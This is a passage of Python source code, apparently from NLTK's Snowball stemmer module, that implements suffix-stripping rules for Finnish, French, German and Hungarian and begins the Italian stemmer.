't\xE4', 'na', 'n\xE4', 'a', '\xE4',
'n')
__step4_suffixes = ('impi', 'impa', 'imp\xE4', 'immi', 'imma',
'imm\xE4', 'mpi', 'mpa', 'mp\xE4', 'mmi',
'mma', 'mm\xE4', 'eja', 'ej\xE4')
def stem(self, word):
"""
Stem a Finnish word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
word = word.lower()
if word in self.stopwords:
return word
step3_success = False
r1, r2 = self._r1r2_standard(word, self.__vowels)
# STEP 1: Particles etc.
for suffix in self.__step1_suffixes:
if r1.endswith(suffix):
if suffix == "sti":
if suffix in r2:
word = word[:-3]
r1 = r1[:-3]
r2 = r2[:-3]
else:
if word[-len(suffix)-1] in "ntaeiouy\xE4\xF6":
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
r2 = r2[:-len(suffix)]
break
# STEP 2: Possessives
for suffix in self.__step2_suffixes:
if r1.endswith(suffix):
if suffix == "si":
if word[-3] != "k":
word = word[:-2]
r1 = r1[:-2]
r2 = r2[:-2]
elif suffix == "ni":
word = word[:-2]
r1 = r1[:-2]
r2 = r2[:-2]
if word.endswith("kse"):
word = suffix_replace(word, "kse", "ksi")
if r1.endswith("kse"):
r1 = suffix_replace(r1, "kse", "ksi")
if r2.endswith("kse"):
r2 = suffix_replace(r2, "kse", "ksi")
elif suffix == "an":
if (word[-4:-2] in ("ta", "na") or
word[-5:-2] in ("ssa", "sta", "lla", "lta")):
word = word[:-2]
r1 = r1[:-2]
r2 = r2[:-2]
elif suffix == "\xE4n":
if (word[-4:-2] in ("t\xE4", "n\xE4") or
word[-5:-2] in ("ss\xE4", "st\xE4",
"ll\xE4", "lt\xE4")):
word = word[:-2]
r1 = r1[:-2]
r2 = r2[:-2]
elif suffix == "en":
if word[-5:-2] in ("lle", "ine"):
word = word[:-2]
r1 = r1[:-2]
r2 = r2[:-2]
else:
word = word[:-3]
r1 = r1[:-3]
r2 = r2[:-3]
break
# STEP 3: Cases
for suffix in self.__step3_suffixes:
if r1.endswith(suffix):
if suffix in ("han", "hen", "hin", "hon", "h\xE4n",
"h\xF6n"):
if ((suffix == "han" and word[-4] == "a") or
(suffix == "hen" and word[-4] == "e") or
(suffix == "hin" and word[-4] == "i") or
(suffix == "hon" and word[-4] == "o") or
(suffix == "h\xE4n" and word[-4] == "\xE4") or
(suffix == "h\xF6n" and word[-4] == "\xF6")):
word = word[:-3]
r1 = r1[:-3]
r2 = r2[:-3]
step3_success = True
elif suffix in ("siin", "den", "tten"):
if (word[-len(suffix)-1] == "i" and
word[-len(suffix)-2] in self.__restricted_vowels):
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
r2 = r2[:-len(suffix)]
step3_success = True
else:
continue
elif suffix == "seen":
if word[-6:-4] in self.__long_vowels:
word = word[:-4]
r1 = r1[:-4]
r2 = r2[:-4]
step3_success = True
else:
continue
elif suffix in ("a", "\xE4"):
if word[-2] in self.__vowels and word[-3] in self.__consonants:
word = word[:-1]
r1 = r1[:-1]
r2 = r2[:-1]
step3_success = True
elif suffix in ("tta", "tt\xE4"):
if word[-4] == "e":
word = word[:-3]
r1 = r1[:-3]
r2 = r2[:-3]
step3_success = True
elif suffix == "n":
word = word[:-1]
r1 = r1[:-1]
r2 = r2[:-1]
step3_success = True
if word[-2:] == "ie" or word[-2:] in self.__long_vowels:
word = word[:-1]
r1 = r1[:-1]
r2 = r2[:-1]
else:
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
r2 = r2[:-len(suffix)]
step3_success = True
break
# STEP 4: Other endings
for suffix in self.__step4_suffixes:
if r2.endswith(suffix):
if suffix in ("mpi", "mpa", "mp\xE4", "mmi", "mma",
"mm\xE4"):
if word[-5:-3] != "po":
word = word[:-3]
r1 = r1[:-3]
r2 = r2[:-3]
else:
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
r2 = r2[:-len(suffix)]
break
# STEP 5: Plurals
if step3_success and len(r1) >= 1 and r1[-1] in "ij":
word = word[:-1]
r1 = r1[:-1]
elif (not step3_success and len(r1) >= 2 and
r1[-1] == "t" and r1[-2] in self.__vowels):
word = word[:-1]
r1 = r1[:-1]
r2 = r2[:-1]
if r2.endswith("imma"):
word = word[:-4]
r1 = r1[:-4]
elif r2.endswith("mma") and r2[-5:-3] != "po":
word = word[:-3]
r1 = r1[:-3]
# STEP 6: Tidying up
if r1[-2:] in self.__long_vowels:
word = word[:-1]
r1 = r1[:-1]
if (len(r1) >= 2 and r1[-2] in self.__consonants and
r1[-1] in "a\xE4ei"):
word = word[:-1]
r1 = r1[:-1]
if r1.endswith(("oj", "uj")):
word = word[:-1]
r1 = r1[:-1]
if r1.endswith("jo"):
word = word[:-1]
r1 = r1[:-1]
# If the word ends with a double consonant
# followed by zero or more vowels, the last consonant is removed.
for i in range(1, len(word)):
if word[-i] in self.__vowels:
continue
else:
if i == 1:
if word[-i-1:] in self.__double_consonants:
word = word[:-1]
else:
if word[-i-1:-i+1] in self.__double_consonants:
word = "".join((word[:-i], word[-i+1:]))
break
return word
class FrenchStemmer(_StandardStemmer):
"""
The French Snowball stemmer.
:cvar __vowels: The French vowels.
:type __vowels: unicode
:cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
:type __step1_suffixes: tuple
:cvar __step2a_suffixes: Suffixes to be deleted in step 2a of the algorithm.
:type __step2a_suffixes: tuple
:cvar __step2b_suffixes: Suffixes to be deleted in step 2b of the algorithm.
:type __step2b_suffixes: tuple
:cvar __step4_suffixes: Suffixes to be deleted in step 4 of the algorithm.
:type __step4_suffixes: tuple
:note: A detailed description of the French
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/french/stemmer.html
"""
__vowels = "aeiouy\xE2\xE0\xEB\xE9\xEA\xE8\xEF\xEE\xF4\xFB\xF9"
__step1_suffixes = ('issements', 'issement', 'atrices', 'atrice',
'ateurs', 'ations', 'logies', 'usions',
'utions', 'ements', 'amment', 'emment',
'ances', 'iqUes', 'ismes', 'ables', 'istes',
'ateur', 'ation', 'logie', 'usion', 'ution',
'ences', 'ement', 'euses', 'ments', 'ance',
'iqUe', 'isme', 'able', 'iste', 'ence',
'it\xE9s', 'ives', 'eaux', 'euse', 'ment',
'eux', 'it\xE9', 'ive', 'ifs', 'aux', 'if')
__step2a_suffixes = ('issaIent', 'issantes', 'iraIent', 'issante',
'issants', 'issions', 'irions', 'issais',
'issait', 'issant', 'issent', 'issiez', 'issons',
'irais', 'irait', 'irent', 'iriez', 'irons',
'iront', 'isses', 'issez', '\xEEmes',
'\xEEtes', 'irai', 'iras', 'irez', 'isse',
'ies', 'ira', '\xEEt', 'ie', 'ir', 'is',
'it', 'i')
__step2b_suffixes = ('eraIent', 'assions', 'erions', 'assent',
'assiez', '\xE8rent', 'erais', 'erait',
'eriez', 'erons', 'eront', 'aIent', 'antes',
'asses', 'ions', 'erai', 'eras', 'erez',
'\xE2mes', '\xE2tes', 'ante', 'ants',
'asse', '\xE9es', 'era', 'iez', 'ais',
'ait', 'ant', '\xE9e', '\xE9s', 'er',
'ez', '\xE2t', 'ai', 'as', '\xE9', 'a')
__step4_suffixes = ('i\xE8re', 'I\xE8re', 'ion', 'ier', 'Ier',
'e', '\xEB')
def stem(self, word):
"""
Stem a French word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
word = word.lower()
if word in self.stopwords:
return word
step1_success = False
rv_ending_found = False
step2a_success = False
step2b_success = False
# Every occurrence of 'u' after 'q' is put into upper case.
for i in range(1, len(word)):
if word[i-1] == "q" and word[i] == "u":
word = "".join((word[:i], "U", word[i+1:]))
# Every occurrence of 'u' and 'i'
# between vowels is put into upper case.
# Every occurrence of 'y' preceded or
# followed by a vowel is also put into upper case.
for i in range(1, len(word)-1):
if word[i-1] in self.__vowels and word[i+1] in self.__vowels:
if word[i] == "u":
word = "".join((word[:i], "U", word[i+1:]))
elif word[i] == "i":
word = "".join((word[:i], "I", word[i+1:]))
if word[i-1] in self.__vowels or word[i+1] in self.__vowels:
if word[i] == "y":
word = "".join((word[:i], "Y", word[i+1:]))
r1, r2 = self._r1r2_standard(word, self.__vowels)
rv = self.__rv_french(word, self.__vowels)
# STEP 1: Standard suffix removal
for suffix in self.__step1_suffixes:
if word.endswith(suffix):
if suffix == "eaux":
word = word[:-1]
step1_success = True
elif suffix in ("euse", "euses"):
if suffix in r2:
word = word[:-len(suffix)]
step1_success = True
elif suffix in r1:
word = suffix_replace(word, suffix, "eux")
step1_success = True
elif suffix in ("ement", "ements") and suffix in rv:
word = word[:-len(suffix)]
step1_success = True
if word[-2:] == "iv" and "iv" in r2:
word = word[:-2]
if word[-2:] == "at" and "at" in r2:
word = word[:-2]
elif word[-3:] == "eus":
if "eus" in r2:
word = word[:-3]
elif "eus" in r1:
word = "".join((word[:-1], "x"))
elif word[-3:] in ("abl", "iqU"):
if "abl" in r2 or "iqU" in r2:
word = word[:-3]
elif word[-3:] in ("i\xE8r", "I\xE8r"):
if "i\xE8r" in rv or "I\xE8r" in rv:
word = "".join((word[:-3], "i"))
elif suffix == "amment" and suffix in rv:
word = suffix_replace(word, "amment", "ant")
rv = suffix_replace(rv, "amment", "ant")
rv_ending_found = True
elif suffix == "emment" and suffix in rv:
word = suffix_replace(word, "emment", "ent")
rv_ending_found = True
elif (suffix in ("ment", "ments") and suffix in rv and
not rv.startswith(suffix) and
rv[rv.rindex(suffix)-1] in self.__vowels):
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
rv_ending_found = True
elif suffix == "aux" and suffix in r1:
word = "".join((word[:-2], "l"))
step1_success = True
elif (suffix in ("issement", "issements") and suffix in r1
and word[-len(suffix)-1] not in self.__vowels):
word = word[:-len(suffix)]
step1_success = True
elif suffix in ("ance", "iqUe", "isme", "able", "iste",
"eux", "ances", "iqUes", "ismes",
"ables", "istes") and suffix in r2:
word = word[:-len(suffix)]
step1_success = True
elif suffix in ("atrice", "ateur", "ation", "atrices",
"ateurs", "ations") and suffix in r2:
word = word[:-len(suffix)]
step1_success = True
if word[-2:] == "ic":
if "ic" in r2:
word = word[:-2]
else:
word = "".join((word[:-2], "iqU"))
elif suffix in ("logie", "logies") and suffix in r2:
word = suffix_replace(word, suffix, "log")
step1_success = True
elif (suffix in ("usion", "ution", "usions", "utions") and
suffix in r2):
word = suffix_replace(word, suffix, "u")
step1_success = True
elif suffix in ("ence", "ences") and suffix in r2:
word = suffix_replace(word, suffix, "ent")
step1_success = True
elif suffix in ("it\xE9", "it\xE9s") and suffix in r2:
word = word[:-len(suffix)]
step1_success = True
if word[-4:] == "abil":
if "abil" in r2:
word = word[:-4]
else:
word = "".join((word[:-2], "l"))
elif word[-2:] == "ic":
if "ic" in r2:
word = word[:-2]
else:
word = "".join((word[:-2], "iqU"))
elif word[-2:] == "iv":
if "iv" in r2:
word = word[:-2]
elif (suffix in ("if", "ive", "ifs", "ives") and
suffix in r2):
word = word[:-len(suffix)]
step1_success = True
if word[-2:] == "at" and "at" in r2:
word = word[:-2]
if word[-2:] == "ic":
if "ic" in r2:
word = word[:-2]
else:
word = "".join((word[:-2], "iqU"))
break
# STEP 2a: Verb suffixes beginning 'i'
if not step1_success or rv_ending_found:
for suffix in self.__step2a_suffixes:
if word.endswith(suffix):
if (suffix in rv and len(rv) > len(suffix) and
rv[rv.rindex(suffix)-1] not in self.__vowels):
word = word[:-len(suffix)]
step2a_success = True
break
# STEP 2b: Other verb suffixes
if not step2a_success:
for suffix in self.__step2b_suffixes:
if rv.endswith(suffix):
if suffix == "ions" and "ions" in r2:
word = word[:-4]
step2b_success = True
elif suffix in ('eraIent', 'erions', '\xE8rent',
'erais', 'erait', 'eriez',
'erons', 'eront', 'erai', 'eras',
'erez', '\xE9es', 'era', 'iez',
'\xE9e', '\xE9s', 'er', 'ez',
'\xE9'):
word = word[:-len(suffix)]
step2b_success = True
elif suffix in ('assions', 'assent', 'assiez',
'aIent', 'antes', 'asses',
'\xE2mes', '\xE2tes', 'ante',
'ants', 'asse', 'ais', 'ait',
'ant', '\xE2t', 'ai', 'as',
'a'):
word = word[:-len(suffix)]
rv = rv[:-len(suffix)]
step2b_success = True
if rv.endswith("e"):
word = word[:-1]
break
# STEP 3
if step1_success or step2a_success or step2b_success:
if word[-1] == "Y":
word = "".join((word[:-1], "i"))
elif word[-1] == "\xE7":
word = "".join((word[:-1], "c"))
# STEP 4: Residual suffixes
else:
if (len(word) >= 2 and word[-1] == "s" and
word[-2] not in "aiou\xE8s"):
word = word[:-1]
for suffix in self.__step4_suffixes:
if word.endswith(suffix):
if suffix in rv:
if (suffix == "ion" and suffix in r2 and
rv[-4] in "st"):
word = word[:-3]
elif suffix in ("ier", "i\xE8re", "Ier",
"I\xE8re"):
word = suffix_replace(word, suffix, "i")
elif suffix == "e":
word = word[:-1]
elif suffix == "\xEB" and word[-3:-1] == "gu":
word = word[:-1]
break
# STEP 5: Undouble
if word.endswith(("enn", "onn", "ett", "ell", "eill")):
word = word[:-1]
# STEP 6: Un-accent
for i in range(1, len(word)):
if word[-i] not in self.__vowels:
i += 1
else:
if i != 1 and word[-i] in ("\xE9", "\xE8"):
word = "".join((word[:-i], "e", word[-i+1:]))
break
word = (word.replace("I", "i")
.replace("U", "u")
.replace("Y", "y"))
return word
def __rv_french(self, word, vowels):
"""
Return the region RV that is used by the French stemmer.
If the word begins with two vowels, RV is the region after
the third letter. Otherwise, it is the region after the first
vowel not at the beginning of the word, or the end of the word
if these positions cannot be found. (Exceptionally, u'par',
u'col' or u'tap' at the beginning of a word is also taken to
define RV as the region to their right.)
:param word: The French word whose region RV is determined.
:type word: str or unicode
:param vowels: The French vowels that are used to determine
the region RV.
:type vowels: unicode
:return: the region RV for the respective French word.
:rtype: unicode
:note: This helper method is invoked by the stem method of
the subclass FrenchStemmer. It is not to be invoked directly!
"""
rv = ""
if len(word) >= 2:
if (word.startswith(("par", "col", "tap")) or
(word[0] in vowels and word[1] in vowels)):
rv = word[3:]
else:
for i in range(1, len(word)):
if word[i] in vowels:
rv = word[i+1:]
break
return rv
class GermanStemmer(_StandardStemmer):
"""
The German Snowball stemmer.
:cvar __vowels: The German vowels.
:type __vowels: unicode
:cvar __s_ending: Letters that may directly appear before a word final 's'.
:type __s_ending: unicode
:cvar __st_ending: Letter that may directly appear before a word final 'st'.
:type __st_ending: unicode
:cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
:type __step1_suffixes: tuple
:cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
:type __step2_suffixes: tuple
:cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
:type __step3_suffixes: tuple
:note: A detailed description of the German
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/german/stemmer.html
"""
__vowels = "aeiouy\xE4\xF6\xFC"
__s_ending = "bdfghklmnrt"
__st_ending = "bdfghklmnt"
__step1_suffixes = ("ern", "em", "er", "en", "es", "e", "s")
__step2_suffixes = ("est", "en", "er", "st")
__step3_suffixes = ("isch", "lich", "heit", "keit",
"end", "ung", "ig", "ik")
def stem(self, word):
"""
Stem a German word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
word = word.lower()
if word in self.stopwords:
return word
word = word.replace("\xDF", "ss")
# Every occurrence of 'u' and 'y'
# between vowels is put into upper case.
for i in range(1, len(word)-1):
if word[i-1] in self.__vowels and word[i+1] in self.__vowels:
if word[i] == "u":
word = "".join((word[:i], "U", word[i+1:]))
elif word[i] == "y":
word = "".join((word[:i], "Y", word[i+1:]))
r1, r2 = self._r1r2_standard(word, self.__vowels)
# R1 is adjusted so that the region before it
# contains at least 3 letters.
for i in range(1, len(word)):
if word[i] not in self.__vowels and word[i-1] in self.__vowels:
if len(word[:i+1]) < 3 and len(word[:i+1]) > 0:
r1 = word[3:]
elif len(word[:i+1]) == 0:
return word
break
# STEP 1
for suffix in self.__step1_suffixes:
if r1.endswith(suffix):
if (suffix in ("en", "es", "e") and
word[-len(suffix)-4:-len(suffix)] == "niss"):
word = word[:-len(suffix)-1]
r1 = r1[:-len(suffix)-1]
r2 = r2[:-len(suffix)-1]
elif suffix == "s":
if word[-2] in self.__s_ending:
word = word[:-1]
r1 = r1[:-1]
r2 = r2[:-1]
else:
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
r2 = r2[:-len(suffix)]
break
# STEP 2
for suffix in self.__step2_suffixes:
if r1.endswith(suffix):
if suffix == "st":
if word[-3] in self.__st_ending and len(word[:-3]) >= 3:
word = word[:-2]
r1 = r1[:-2]
r2 = r2[:-2]
else:
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
r2 = r2[:-len(suffix)]
break
# STEP 3: Derivational suffixes
for suffix in self.__step3_suffixes:
if r2.endswith(suffix):
if suffix in ("end", "ung"):
if ("ig" in r2[-len(suffix)-2:-len(suffix)] and
"e" not in r2[-len(suffix)-3:-len(suffix)-2]):
word = word[:-len(suffix)-2]
else:
word = word[:-len(suffix)]
elif (suffix in ("ig", "ik", "isch") and
"e" not in r2[-len(suffix)-1:-len(suffix)]):
word = word[:-len(suffix)]
elif suffix in ("lich", "heit"):
if ("er" in r1[-len(suffix)-2:-len(suffix)] or
"en" in r1[-len(suffix)-2:-len(suffix)]):
word = word[:-len(suffix)-2]
else:
word = word[:-len(suffix)]
elif suffix == "keit":
if "lich" in r2[-len(suffix)-4:-len(suffix)]:
word = word[:-len(suffix)-4]
elif "ig" in r2[-len(suffix)-2:-len(suffix)]:
word = word[:-len(suffix)-2]
else:
word = word[:-len(suffix)]
break
# Umlaut accents are removed and
# 'u' and 'y' are put back into lower case.
word = (word.replace("\xE4", "a").replace("\xF6", "o")
.replace("\xFC", "u").replace("U", "u")
.replace("Y", "y"))
return word
class HungarianStemmer(_LanguageSpecificStemmer):
"""
The Hungarian Snowball stemmer.
:cvar __vowels: The Hungarian vowels.
:type __vowels: unicode
:cvar __digraphs: The Hungarian digraphs.
:type __digraphs: tuple
:cvar __double_consonants: The Hungarian double consonants.
:type __double_consonants: tuple
:cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
:type __step1_suffixes: tuple
:cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
:type __step2_suffixes: tuple
:cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
:type __step3_suffixes: tuple
:cvar __step4_suffixes: Suffixes to be deleted in step 4 of the algorithm.
:type __step4_suffixes: tuple
:cvar __step5_suffixes: Suffixes to be deleted in step 5 of the algorithm.
:type __step5_suffixes: tuple
:cvar __step6_suffixes: Suffixes to be deleted in step 6 of the algorithm.
:type __step6_suffixes: tuple
:cvar __step7_suffixes: Suffixes to be deleted in step 7 of the algorithm.
:type __step7_suffixes: tuple
:cvar __step8_suffixes: Suffixes to be deleted in step 8 of the algorithm.
:type __step8_suffixes: tuple
:cvar __step9_suffixes: Suffixes to be deleted in step 9 of the algorithm.
:type __step9_suffixes: tuple
:note: A detailed description of the Hungarian
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/hungarian/stemmer.html
"""
__vowels = "aeiou\xF6\xFC\xE1\xE9\xED\xF3\xF5\xFA\xFB"
__digraphs = ("cs", "dz", "dzs", "gy", "ly", "ny", "ty", "zs")
__double_consonants = ("bb", "cc", "ccs", "dd", "ff", "gg",
"ggy", "jj", "kk", "ll", "lly", "mm",
"nn", "nny", "pp", "rr", "ss", "ssz",
"tt", "tty", "vv", "zz", "zzs")
__step1_suffixes = ("al", "el")
__step2_suffixes = ('k\xE9ppen', 'onk\xE9nt', 'enk\xE9nt',
'ank\xE9nt', 'k\xE9pp', 'k\xE9nt', 'ban',
'ben', 'nak', 'nek', 'val', 'vel', 't\xF3l',
't\xF5l', 'r\xF3l', 'r\xF5l', 'b\xF3l',
'b\xF5l', 'hoz', 'hez', 'h\xF6z',
'n\xE1l', 'n\xE9l', '\xE9rt', 'kor',
'ba', 'be', 'ra', 're', 'ig', 'at', 'et',
'ot', '\xF6t', 'ul', '\xFCl', 'v\xE1',
'v\xE9', 'en', 'on', 'an', '\xF6n',
'n', 't')
__step3_suffixes = ("\xE1nk\xE9nt", "\xE1n", "\xE9n")
__step4_suffixes = ('astul', 'est\xFCl', '\xE1stul',
'\xE9st\xFCl', 'stul', 'st\xFCl')
__step5_suffixes = ("\xE1", "\xE9")
__step6_suffixes = ('ok\xE9', '\xF6k\xE9', 'ak\xE9',
'ek\xE9', '\xE1k\xE9', '\xE1\xE9i',
'\xE9k\xE9', '\xE9\xE9i', 'k\xE9',
'\xE9i', '\xE9\xE9', '\xE9')
__step7_suffixes = ('\xE1juk', '\xE9j\xFCk', '\xFCnk',
'unk', 'juk', 'j\xFCk', '\xE1nk',
'\xE9nk', 'nk', 'uk', '\xFCk', 'em',
'om', 'am', 'od', 'ed', 'ad', '\xF6d',
'ja', 'je', '\xE1m', '\xE1d', '\xE9m',
'\xE9d', 'm', 'd', 'a', 'e', 'o',
'\xE1', '\xE9')
__step8_suffixes = ('jaitok', 'jeitek', 'jaink', 'jeink', 'aitok',
'eitek', '\xE1itok', '\xE9itek', 'jaim',
'jeim', 'jaid', 'jeid', 'eink', 'aink',
'itek', 'jeik', 'jaik', '\xE1ink',
'\xE9ink', 'aim', 'eim', 'aid', 'eid',
'jai', 'jei', 'ink', 'aik', 'eik',
'\xE1im', '\xE1id', '\xE1ik', '\xE9im',
'\xE9id', '\xE9ik', 'im', 'id', 'ai',
'ei', 'ik', '\xE1i', '\xE9i', 'i')
__step9_suffixes = ("\xE1k", "\xE9k", "\xF6k", "ok",
"ek", "ak", "k")
def stem(self, word):
"""
Stem an Hungarian word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
word = word.lower()
if word in self.stopwords:
return word
r1 = self.__r1_hungarian(word, self.__vowels, self.__digraphs)
# STEP 1: Remove instrumental case
if r1.endswith(self.__step1_suffixes):
for double_cons in self.__double_consonants:
if word[-2-len(double_cons):-2] == double_cons:
word = "".join((word[:-4], word[-3]))
if r1[-2-len(double_cons):-2] == double_cons:
r1 = "".join((r1[:-4], r1[-3]))
break
# STEP 2: Remove frequent cases
for suffix in self.__step2_suffixes:
if word.endswith(suffix):
if r1.endswith(suffix):
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
if r1.endswith("\xE1"):
word = "".join((word[:-1], "a"))
r1 = suffix_replace(r1, "\xE1", "a")
elif r1.endswith("\xE9"):
word = "".join((word[:-1], "e"))
r1 = suffix_replace(r1, "\xE9", "e")
break
# STEP 3: Remove special cases
for suffix in self.__step3_suffixes:
if r1.endswith(suffix):
if suffix == "\xE9n":
word = suffix_replace(word, suffix, "e")
r1 = suffix_replace(r1, suffix, "e")
else:
word = suffix_replace(word, suffix, "a")
r1 = suffix_replace(r1, suffix, "a")
break
# STEP 4: Remove other cases
for suffix in self.__step4_suffixes:
if r1.endswith(suffix):
if suffix == "\xE1stul":
word = suffix_replace(word, suffix, "a")
r1 = suffix_replace(r1, suffix, "a")
elif suffix == "\xE9st\xFCl":
word = suffix_replace(word, suffix, "e")
r1 = suffix_replace(r1, suffix, "e")
else:
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
break
# STEP 5: Remove factive case
for suffix in self.__step5_suffixes:
if r1.endswith(suffix):
for double_cons in self.__double_consonants:
if word[-1-len(double_cons):-1] == double_cons:
word = "".join((word[:-3], word[-2]))
if r1[-1-len(double_cons):-1] == double_cons:
r1 = "".join((r1[:-3], r1[-2]))
break
# STEP 6: Remove owned
for suffix in self.__step6_suffixes:
if r1.endswith(suffix):
if suffix in ("\xE1k\xE9", "\xE1\xE9i"):
word = suffix_replace(word, suffix, "a")
r1 = suffix_replace(r1, suffix, "a")
elif suffix in ("\xE9k\xE9", "\xE9\xE9i",
"\xE9\xE9"):
word = suffix_replace(word, suffix, "e")
r1 = suffix_replace(r1, suffix, "e")
else:
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
break
# STEP 7: Remove singular owner suffixes
for suffix in self.__step7_suffixes:
if word.endswith(suffix):
if r1.endswith(suffix):
if suffix in ("\xE1nk", "\xE1juk", "\xE1m",
"\xE1d", "\xE1"):
word = suffix_replace(word, suffix, "a")
r1 = suffix_replace(r1, suffix, "a")
elif suffix in ("\xE9nk", "\xE9j\xFCk",
"\xE9m", "\xE9d", "\xE9"):
word = suffix_replace(word, suffix, "e")
r1 = suffix_replace(r1, suffix, "e")
else:
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
break
# STEP 8: Remove plural owner suffixes
for suffix in self.__step8_suffixes:
if word.endswith(suffix):
if r1.endswith(suffix):
if suffix in ("\xE1im", "\xE1id", "\xE1i",
"\xE1ink", "\xE1itok", "\xE1ik"):
word = suffix_replace(word, suffix, "a")
r1 = suffix_replace(r1, suffix, "a")
elif suffix in ("\xE9im", "\xE9id", "\xE9i",
"\xE9ink", "\xE9itek", "\xE9ik"):
word = suffix_replace(word, suffix, "e")
r1 = suffix_replace(r1, suffix, "e")
else:
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
break
# STEP 9: Remove plural suffixes
for suffix in self.__step9_suffixes:
if word.endswith(suffix):
if r1.endswith(suffix):
if suffix == "\xE1k":
word = suffix_replace(word, suffix, "a")
elif suffix == "\xE9k":
word = suffix_replace(word, suffix, "e")
else:
word = word[:-len(suffix)]
break
return word
def __r1_hungarian(self, word, vowels, digraphs):
"""
Return the region R1 that is used by the Hungarian stemmer.
If the word begins with a vowel, R1 is defined as the region
after the first consonant or digraph (= two letters stand for
one phoneme) in the word. If the word begins with a consonant,
it is defined as the region after the first vowel in the word.
If the word does not contain both a vowel and consonant, R1
is the null region at the end of the word.
:param word: The Hungarian word whose region R1 is determined.
:type word: str or unicode
:param vowels: The Hungarian vowels that are used to determine
the region R1.
:type vowels: unicode
:param digraphs: The digraphs that are used to determine the
region R1.
:type digraphs: tuple
:return: the region R1 for the respective word.
:rtype: unicode
:note: This helper method is invoked by the stem method of the subclass
HungarianStemmer. It is not to be invoked directly!
"""
r1 = ""
if word[0] in vowels:
for digraph in digraphs:
if digraph in word[1:]:
r1 = word[word.index(digraph[-1])+1:]
return r1
for i in range(1, len(word)):
if word[i] not in vowels:
r1 = word[i+1:]
break
else:
for i in range(1, len(word)):
if word[i] in vowels:
r1 = word[i+1:]
break
return r1
class ItalianStemmer(_StandardStemmer):
"""
The Italian Snowball stemmer.
:cvar __vowels: The Italian vowels.
:type __vowels: unicode
:cvar __step0_suffixes: Suffixes to be deleted in step 0 of the algorithm.
:type __step0_suffixes: tuple
:cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
:type __step1_suffixes: tuple
:cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
:type __step2_suffixes: tuple
:note: A detailed description of the Italian
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/italian/stemmer.html
"""
__vowels = "aeiou\xE0\xE8\xEC\xF2\xF9"
__step0_suffixes = ('gliela', 'gliele', 'glieli', 'glielo',
'gliene', 'sene', 'mela', 'mele', 'meli',
'melo', 'mene', 'tela', 'tele', 'teli',
'telo', 'tene', 'cela', 'cele', 'celi',
'celo', 'cene', 'vela', 'vele', 'veli',
'velo', 'vene', 'gli', 'ci', 'la', 'le',
'li', 'lo', 'mi', 'ne', 'si', 'ti', 'vi')
__step1_suffixes = ('atrice', 'atrici', 'azione', 'azioni',
'uzione', 'uzioni', 'usione', 'usioni',
'amento', 'amenti', 'imento', 'imenti',
'amente', 'abile', 'abili', 'ibile', 'ibili',
'mente', 'atore', 'atori', 'logia', 'logie',
'anza', 'anze', 'iche', 'ichi', 'ismo',
'ismi', 'ista', 'iste', 'isti', 'ist\xE0',
'ist\xE8', 'ist\xEC', 'ante', 'anti',
'enza', 'enze', 'ico', 'ici', 'ica', 'ice',
'oso', 'osi', 'osa', 'ose', 'it\xE0',
'ivo', 'ivi', 'iva', 'ive')
__step2_suffixes = ('erebbero', 'irebbero', 'assero', 'assimo',
'eranno', 'erebbe', 'eremmo', 'ereste',
'eresti', 'essero', 'iranno', 'irebbe',
'iremmo', 'ireste', 'iresti', 'iscano',
'iscono', 'issero', 'arono', 'avamo', 'avano',
'avate', 'eremo', 'erete', 'erono', 'evamo',
'evano', 'evate', 'iremo', 'irete', 'irono',
'ivamo', 'ivano', 'ivate', 'ammo', 'ando',
'asse', 'assi', 'emmo', 'enda', 'ende',
'endi', 'endo', 'erai', 'erei', 'Yamo',
'iamo', 'immo', 'irai', 'irei', 'isca',
'isce', 'isci', 'isco', 'ano', 'are', 'ata',
'ate', 'ati', 'ato', 'ava', 'avi', 'avo',
'er\xE0', 'ere', 'er\xF2', 'ete', 'eva',
'evi', 'evo', 'ir\xE0', 'ire', 'ir\xF2',
'ita', 'ite', 'iti', 'ito', 'iva', 'ivi',
'ivo', 'ono', 'uta', 'ute', 'uti', 'uto',
'ar', 'ir')
def stem(self, word):
"""
Stem an Italian word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
word = word.lower()
if word in self.stopwords:
return word
step1_success = False
# All acute accents are replaced by grave accents.
word = (word.replace("\xE1", "\xE0")
.replace("\xE9", "\xE8")
.replace("\xED", "\xEC")
.replace("\xF3", "\xF2")
.replace("\xFA", "\xF9"))
# Every occurrence of 'u' after 'q'
# is put into upper case.
for i in range(1, len(word)):
if word[i-1] == "q" and word[i] == "u":
word = "".join((word[:i], "U", word[i+1:]))
# Every occurrence of 'u' and 'i'
# between vowels is put into upper case.
for i in range(1, len(word)-1):
if word[i-1] in self.__vowels and word[i+1] in self.__vowels:
